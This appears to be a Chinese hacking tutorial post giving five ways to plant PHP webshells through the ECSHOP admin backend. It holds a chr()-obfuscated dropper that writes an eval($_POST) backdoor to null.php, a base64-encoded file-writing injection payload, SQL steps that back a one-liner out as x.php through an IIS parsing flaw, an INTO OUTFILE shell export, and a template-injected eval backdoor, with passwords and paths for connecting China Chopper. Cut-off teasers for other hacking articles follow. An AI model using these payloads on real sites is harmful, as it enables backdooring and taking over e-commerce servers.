*** 一、
进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,左上角上传类型选择media,然后就可以直接上传php小马。文件路径是:/images/upload/Media/xx.php
*** 二、
后台-订单管理-订单打印-选择源代码编辑-在最后面插入代码-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,一句话密码:u ***
代码:
<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr
(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr
(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg) echo chr(79).chr
(75).chr(33); @fclose($fp); ?>
*** 三、
${${fputs(fopen(base64_decode(cGNzbGkucGhw),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbcGNzbGldKT8+))}}
*** 四、
用sql查询然后备份的 *** ,具体是找到数据库管理→SQL查询,然后执行SQL语句
建立新表 (ps:ECSHOP只调用了指定前缀的表 所以表名设为 ecs_cmd)
create table ecs_cmd(cmd text);
在新建立的表中插入一句话
insert into ecs_cmd(cmd) values(‘<php eval($_POST[cmd]);>’);
在数据备份里面→点击自定义备份 可以看到我们新建立的表
选中它后直接备份名改成成x.php;(这是iis解析漏洞,如果是apache可以改成x.php.x.x.x) 就成功备份出来PHP一句话文件了 文件地址:chncto.com/data/sqldata/x.php;x.sql 直接上菜刀连接接即可
另外如果有root权限,也可以接着执行sql语句,导出一个shell
select cmd from a into outfile ‘网站路径\eval.php’;
找网站路径可以用 use 数据库名; 或者有时也可以用 *** 三来爆出路径
*** 五、
后台–模版管理–库项目管理,选择一个库项目为myship.lbi-配送方式,在代码最下面插入php一句话木马:
<?php eval ($_POST[x]);?>
接着保存,一句话路径是:http://www.chncto.com/myship.php
织网5.7的漏洞,可任意上传~ 搜索关键词:Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc 访问/data/admin/ver.txt来查...
前一段时间,由于程序漏洞造成网页内容多处被挂博彩的内容信息,木马删除后,但是百度收录的挂马页面却都过去几个月了依然还是存在于是利用百度站长平台工具的死链提交将挂马页面删除。下面就为大家分享一下详细的操...
什么叫Wifiphisher? Wifiphisher是一种WiFi黑客工具,能够对无线网络/ WiFi互联网实行迅速的全自动互联网中间人攻击,目地是发觉客户和登陆密码凭证。 与无线网...
在日常分析软件漏洞时,经常需要耗费比较长的分析时间,少则几小时,多则数天,甚至更久。因此,经常总结一些分析技巧是非常有必要的,针对不同的漏洞类型采取不同的分析思路和技巧,可以有效地提高分析速度。对于一...
微软公司的“程序运行控制方法”:AppLocker,管理人员能够十分便捷地开展配备,以操纵客户能够在电子计算机上可运作什么程序流程、安裝什么文档、运作什么脚本制作?网络黑客假如能绕开AppLocke...
什么叫Retina? Retina是安全性制造行业最受尊重和业内认证的漏洞检测程序流程之一,是大家的漏洞管理解决方法的模块。沒有更强的挑选来维护您的互联网免遭系统漏洞的进攻。 Reti...